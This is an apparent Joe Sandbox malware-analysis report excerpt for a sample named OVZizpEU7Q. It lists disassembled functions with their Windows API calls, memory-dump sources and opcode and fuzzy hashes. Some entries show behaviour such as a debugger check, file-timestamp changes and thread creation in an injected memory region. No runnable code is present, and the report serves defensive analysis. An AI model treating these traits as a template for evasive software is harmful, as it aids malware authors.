                                                                                          • Part of subcall function 00404750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00404743,?,?,004037AE,?), ref: 00404770
                                                                                          • Part of subcall function 00420791: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 004207B0
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: Name$Path$FileFullLongOpen_memset
                                                                                        • String ID: X
                                                                                        • API String ID: 3777226403-3081909835
                                                                                        • Opcode ID: f7a2dfced1c7fac4da1122c6cfde17308801e93c3a8658db5658365851755d62
                                                                                        • Instruction ID: baa1e7331fae4d359aac7897d23b5e8ce5a65ce190648e6f88e75d23560a4c0c
                                                                                        • Opcode Fuzzy Hash: f7a2dfced1c7fac4da1122c6cfde17308801e93c3a8658db5658365851755d62
                                                                                        • Instruction Fuzzy Hash: 4421A471A102589BCB41DF95D845BDE7BF8AF49314F00806FE508B7281DBB85989CFAA
                                                                                        Function 004698E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetTempPathW.KERNEL32(00000104,?), ref: 004698F8
                                                                                        • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 0046990F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: Temp$FileNamePath
                                                                                        • String ID: aut
                                                                                        • API String ID: 3285503233-3010740371
                                                                                        • Opcode ID: d3e801ab242beb6fec4b4f89e1aaff04be832202f3ef9fc21f6b566375e79959
                                                                                        • Instruction ID: d76eb4abf93f0e171a782776cb2de2514a1bc3ee8d101bd4a6c1c3d5b9ef8161
                                                                                        • Opcode Fuzzy Hash: d3e801ab242beb6fec4b4f89e1aaff04be832202f3ef9fc21f6b566375e79959
                                                                                        • Instruction Fuzzy Hash: D0D05E7954030DABDB50ABA0DC0EFDA773CE704700F0006F5BA54D10A1EAB1A5988BA9
                                                                                        Function 0047CADD Relevance: 4.9, APIs: 3, Instructions: 392COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: e563156e91e36691d5f4fcac2aaf6be647dac8c86d34431775506fe1d7328f76
                                                                                        • Instruction ID: 208f182f3c9136cc863dec11eab3d0960db0a10b8073f2b3425ab1c058278d8f
                                                                                        • Opcode Fuzzy Hash: e563156e91e36691d5f4fcac2aaf6be647dac8c86d34431775506fe1d7328f76
                                                                                        • Instruction Fuzzy Hash: 8AF13A716083019FC714DF29C480A6ABBE5FF88318F54892EF8999B392D734E945CF86
                                                                                        Function 00AE7DF0 Relevance: 4.6, APIs: 3, Instructions: 89COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2311032865.0000000000AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AC0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ac0000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: ComputerName
                                                                                        • String ID:
                                                                                        • API String ID: 3545744682-0
                                                                                        • Opcode ID: 38ab21e8312f4446f1e4d74e8157d3637eace4b432985e0ad559e60a3ebdf03d
                                                                                        • Instruction ID: 41f9f2bfa702bb88a6f95ba033227efd5f8dcc5b9b62450780ab29f3ac805d40
                                                                                        • Opcode Fuzzy Hash: 38ab21e8312f4446f1e4d74e8157d3637eace4b432985e0ad559e60a3ebdf03d
                                                                                        • Instruction Fuzzy Hash: 1521F534A4D3C47BEA3657178C86FBD3A35AF61710F884886F589561D2E9A82C08CB63
                                                                                        Function 0040434A Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00404370
                                                                                        • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00404415
                                                                                        • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00404432
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: IconNotifyShell_$_memset
                                                                                        • String ID:
                                                                                        • API String ID: 1505330794-0
                                                                                        • Opcode ID: 55e578eaf81f1082cb721cb8179a93cbba9ea3621e04278649df261dfa9eaab8
                                                                                        • Instruction ID: 448a70bf35e4549ae47872dc9eb977fea889799f7ce089bf6dae1479d4278b9a
                                                                                        • Opcode Fuzzy Hash: 55e578eaf81f1082cb721cb8179a93cbba9ea3621e04278649df261dfa9eaab8
                                                                                        • Instruction Fuzzy Hash: 4E3184B05047019FD760DF24D884A9BBBF8FB98308F00093FEA9A92391D7746944CB5A
                                                                                        Function 0042571C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • __FF_MSGBANNER.LIBCMT ref: 00425733
                                                                                          • Part of subcall function 0042A16B: __NMSG_WRITE.LIBCMT ref: 0042A192
                                                                                          • Part of subcall function 0042A16B: __NMSG_WRITE.LIBCMT ref: 0042A19C
                                                                                        • __NMSG_WRITE.LIBCMT ref: 0042573A
                                                                                          • Part of subcall function 0042A1C8: GetModuleFileNameW.KERNEL32(00000000,004C33BA,00000104,00000000,00000001,00000000), ref: 0042A25A
                                                                                          • Part of subcall function 0042A1C8: ___crtMessageBoxW.LIBCMT ref: 0042A308
                                                                                          • Part of subcall function 0042309F: ___crtCorExitProcess.LIBCMT ref: 004230A5
                                                                                          • Part of subcall function 0042309F: ExitProcess.KERNEL32 ref: 004230AE
                                                                                          • Part of subcall function 00428B28: __getptd_noexit.LIBCMT ref: 00428B28
                                                                                        • RtlAllocateHeap.NTDLL(00CB0000,00000000,00000001,?,00000000,00000001,?,00420DD3,?,00000000,%I,?,00409E8C,?,?,?), ref: 0042575F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                                        • String ID:
                                                                                        • API String ID: 1372826849-0
                                                                                        • Opcode ID: 173bc1eb0939af60788e3920f729a181213a4711687b08a62f5fb4dd74449d1b
                                                                                        • Instruction ID: 12628286b9c33790f0bcaf27d243d0f78d5a939af01e39ac9af769d2403f214a
                                                                                        • Opcode Fuzzy Hash: 173bc1eb0939af60788e3920f729a181213a4711687b08a62f5fb4dd74449d1b
                                                                                        • Instruction Fuzzy Hash: 8101D235380B31DADA102B36BC42A2E67588BC2766FD0043FF9059A281DE7C9D01866D
                                                                                        Function 004698A2 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00469548,?,?,?,?,?,00000004), ref: 004698BB
                                                                                        • SetFileTime.KERNEL32(00000000,?,00000000,?,?,00469548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 004698D1
                                                                                        • CloseHandle.KERNEL32(00000000,?,00469548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 004698D8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$CloseCreateHandleTime
                                                                                        • String ID:
                                                                                        • API String ID: 3397143404-0
                                                                                        • Opcode ID: bd87c49bddbed0dd2230edd6d70eff61a4bb717c0cd42ce1b208173b53aacf55
                                                                                        • Instruction ID: c759ec0fed9c3a555ac5ec6521767d99e991bc38b38178bd45d0c2782cb34c4e
                                                                                        • Opcode Fuzzy Hash: bd87c49bddbed0dd2230edd6d70eff61a4bb717c0cd42ce1b208173b53aacf55
                                                                                        • Instruction Fuzzy Hash: 6EE08632140214B7D7212B54EC0DFDE7B19EB06760F144535FF14A90E087B12925979C
                                                                                        Function 00468D0D Relevance: 4.5, APIs: 3, Instructions: 22COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _free.LIBCMT ref: 00468D1B
                                                                                          • Part of subcall function 00422D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00429A24), ref: 00422D69
                                                                                          • Part of subcall function 00422D55: GetLastError.KERNEL32(00000000,?,00429A24), ref: 00422D7B
                                                                                        • _free.LIBCMT ref: 00468D2C
                                                                                        • _free.LIBCMT ref: 00468D3E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                        • String ID:
                                                                                        • API String ID: 776569668-0
                                                                                        • Opcode ID: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                                                                        • Instruction ID: 6b151060fb8ed88ed9ffdc5938a612973e117ec8253147f08314cae1c0c73c84
                                                                                        • Opcode Fuzzy Hash: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                                                                        • Instruction Fuzzy Hash: 10E0C2B170171253CB20A579BA40A8313DC4F4C3967440A0FB40DD7282DEACF842803C
                                                                                        Function 0040A9C3 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: CALL
                                                                                        • API String ID: 0-4196123274
                                                                                        • Opcode ID: 2ed6c0f66a2aa506629b087723f93e14441bcd6fa1d61a343de796f1b7ccce07
                                                                                        • Instruction ID: c803bb07f2a617980fc862d1973d54e65b33ee20ceb4547c7cbfd92c67e19f3b
                                                                                        • Opcode Fuzzy Hash: 2ed6c0f66a2aa506629b087723f93e14441bcd6fa1d61a343de796f1b7ccce07
                                                                                        • Instruction Fuzzy Hash: 8A225B70608301DFD724DF14C454A6AB7E1FF44308F15896EE98AAB3A2D739EC55CB8A
                                                                                        Function 00465B7A Relevance: 3.1, APIs: 2, Instructions: 142COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CharLowerBuffW.USER32(?,?), ref: 00465B93
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: BuffCharLower
                                                                                        • String ID:
                                                                                        • API String ID: 2358735015-0
                                                                                        • Opcode ID: 3777b23920151bf851aec23b6fb31a5a2081c72a50bd5cf69692a0bddbc102f6
                                                                                        • Instruction ID: ca699bb1c278210e2bea96785600e82950db412e583262dd6e63fce83db42ac8
                                                                                        • Opcode Fuzzy Hash: 3777b23920151bf851aec23b6fb31a5a2081c72a50bd5cf69692a0bddbc102f6
                                                                                        • Instruction Fuzzy Hash: 0441A2B2500709AFDB11DF65C8809AFB3B8EB44314F10862FE956D7281EB78AE01CB55
                                                                                        Function 004677B3 Relevance: 3.1, APIs: 2, Instructions: 133COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: _memmove
                                                                                        • String ID:
                                                                                        • API String ID: 4104443479-0
                                                                                        • Opcode ID: 996439cad23a807cbd113a306aeab498e3181c374ce292e3de8f96b683a21677
                                                                                        • Instruction ID: 665aeeeda7618be144ab26ba5ea9c3b14b1a5e971dff4faecb2a1d88e99e5761
                                                                                        • Opcode Fuzzy Hash: 996439cad23a807cbd113a306aeab498e3181c374ce292e3de8f96b683a21677
                                                                                        • Instruction Fuzzy Hash: 8841D7716082059BCB10FFA9D8859BAB7E8EF49308B64445FE14597382EF3D9C05CB6A
                                                                                        Function 00407A51 Relevance: 3.1, APIs: 2, Instructions: 97COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: _memmove
                                                                                        • String ID:
                                                                                        • API String ID: 4104443479-0
                                                                                        • Opcode ID: 75b3ef76dc9c1d7680ff1126038a0b5bca49f3ec50bdc15de679bd26e1e87542
                                                                                        • Instruction ID: 2724e85abdc1188f3097b0ceee28e317ee468c7dcaf0b9eeda237b3ec1003ef0
                                                                                        • Opcode Fuzzy Hash: 75b3ef76dc9c1d7680ff1126038a0b5bca49f3ec50bdc15de679bd26e1e87542
                                                                                        • Instruction Fuzzy Hash: CB31C4B1B00506AFC704DF69D891E69B3A4FF48314715822AE519CB3D1EB38F911CB95
                                                                                        Function 00AC5A3B Relevance: 3.1, APIs: 2, Instructions: 61threadCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CreateThread.KERNEL32(00000000,00000000,00AC55C0,?,00000000,00000000), ref: 00AC5A51
                                                                                        • RtlExitUserThread.NTDLL(00000000), ref: 00AC5B11
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2311032865.0000000000AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AC0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ac0000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: Thread$CreateExitUser
                                                                                        • String ID:
                                                                                        • API String ID: 4108186749-0
                                                                                        • Opcode ID: 7ecdbe1f06e605cd53eb05eeea2eba22fe496df1e4c680a121d8bff0b1591471
                                                                                        • Instruction ID: 3f9bc59880fa4e92b10e8f84b976ae05dda81d42fea58394d3e2cb2d8a097682
                                                                                        • Opcode Fuzzy Hash: 7ecdbe1f06e605cd53eb05eeea2eba22fe496df1e4c680a121d8bff0b1591471
                                                                                        • Instruction Fuzzy Hash: 6F112C11D0DBC14ED72787744825B66AFA05F63720F4F06CEE0918E0E3D6696D8C93A3
                                                                                        Function 004047D0 Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • IsThemeActive.UXTHEME ref: 00404834
                                                                                          • Part of subcall function 0042336C: __lock.LIBCMT ref: 00423372
                                                                                          • Part of subcall function 0042336C: DecodePointer.KERNEL32(00000001,?,00404849,00457C74), ref: 0042337E
                                                                                          • Part of subcall function 0042336C: EncodePointer.KERNEL32(?,?,00404849,00457C74), ref: 00423389
                                                                                          • Part of subcall function 004048FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00404915
                                                                                          • Part of subcall function 004048FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0040492A
                                                                                          • Part of subcall function 00403B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00403B68
                                                                                          • Part of subcall function 00403B3A: IsDebuggerPresent.KERNEL32 ref: 00403B7A
                                                                                          • Part of subcall function 00403B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,004C52F8,004C52E0,?,?), ref: 00403BEB
                                                                                          • Part of subcall function 00403B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 00403C6F
                                                                                        • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00404874
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                                                        • String ID:
                                                                                        • API String ID: 1438897964-0
                                                                                        • Opcode ID: 13bbe0c74f5194e49c071aa5a0b14ab81aac5f2f5d26dabd82ae82306b4d1084
                                                                                        • Instruction ID: 9525eea27cfe2a06ee6bb0b94f8a439f0fec78f72a1223afaaa4f4cc7b3f6ca0
                                                                                        • Opcode Fuzzy Hash: 13bbe0c74f5194e49c071aa5a0b14ab81aac5f2f5d26dabd82ae82306b4d1084
                                                                                        • Instruction Fuzzy Hash: 96118E729143019BC700EF69E80591EBBE8EB95754F10893FF440932B2DB749A49CB9E
                                                                                        Function 00420DB6 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 0042571C: __FF_MSGBANNER.LIBCMT ref: 00425733
                                                                                          • Part of subcall function 0042571C: __NMSG_WRITE.LIBCMT ref: 0042573A
                                                                                          • Part of subcall function 0042571C: RtlAllocateHeap.NTDLL(00CB0000,00000000,00000001,?,00000000,00000001,?,00420DD3,?,00000000,%I,?,00409E8C,?,?,?), ref: 0042575F
                                                                                        • std::exception::exception.LIBCMT ref: 00420DEC
                                                                                        • __CxxThrowException@8.LIBCMT ref: 00420E01
                                                                                          • Part of subcall function 0042859B: RaiseException.KERNEL32(?,?,00000000,004B9E78,?,00000001,?,?,?,00420E06,00000000,004B9E78,00409E8C,00000001), ref: 004285F0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
